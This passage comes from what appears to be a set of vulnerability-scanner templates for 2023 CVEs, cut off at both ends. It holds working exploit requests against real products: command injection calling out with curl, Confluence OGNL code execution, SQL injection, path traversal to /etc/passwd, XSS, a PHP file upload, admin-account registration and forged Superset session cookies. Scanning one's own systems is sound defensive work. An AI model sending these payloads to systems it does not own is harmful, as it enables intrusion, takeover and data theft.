curl"]}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(3)>","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email</span> :","XWiki.XWikiUsers[0]","email_checked</span>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-38992","info":{"name":"Jeecg-Boot v3.5.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username","{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"],"payloads":{"path":[null,"jeecg-boot/"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parentId\\\":\", \"key\\\":\", \"{\\\"title\", \"success\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src/onerror=\"alert(document.domain)\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-6038","info":{"name":"H2O ImportFiles - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\n","POST /3/ParseSetup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsource_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'ImportFilesV3')","regex('root:.*:0:0:', body_2)","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert(document.domain)> appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':","<img onerror=alert(document.domain) src=1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard</a>"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src/onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n      __schema {\\r\\n        \\r\\n        queryType { name }\\r\\n        mutationType { name }\\r\\n        subscriptionType { name }\\r\\n        types {\\r\\n          ...FullType\\r\\n        }\\r\\n        directives {\\r\\n          name\\r\\n          description\\r\\n          \\r\\n          locations\\r\\n          args {\\r\\n            ...InputValue\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment FullType on __Type {\\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      \\r\\n      fields(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        args {\\r\\n          ...InputValue\\r\\n        }\\r\\n        type {\\r\\n          ...TypeRef\\r\\n        }\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      inputFields {\\r\\n        ...InputValue\\r\\n      }\\r\\n      interfaces {\\r\\n        ...TypeRef\\r\\n      }\\r\\n      enumValues(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      possibleTypes {\\r\\n        ...TypeRef\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment InputValue on __InputValue {\\r\\n      name\\r\\n      description\\r\\n      type { ...TypeRef }\\r\\n      defaultValue\\r\\n      \\r\\n      \\r\\n    }\\r\\n\\r\\n    fragment TypeRef on __Type {\\r\\n      kind\\r\\n      name\\r\\n      ofType {\\r\\n        kind\\r\\n        name\\r\\n        ofType {\\r\\n          kind\\r\\n          name\\r\\n          ofType {\\r\\n            kind\\r\\n            name\\r\\n            ofType {\\r\\n              kind\\r\\n              name\\r\\n              ofType {\\r\\n                kind\\r\\n                name\\r\\n                ofType {\\r\\n                  kind\\r\\n                  name\\r\\n                  ofType {\\r\\n                    kind\\r\\n                    name\\r\\n                  }\\r\\n                }\\r\\n              }\\r\\n            }\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :<img src=1 onerror=alert(document.domain)>: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"</script><img src=1 onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-6023","info":{"name":"VertaAI ModelDB - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35156","info":{"name":"XWiki >= 6.0-rc-1 - Cross-Site 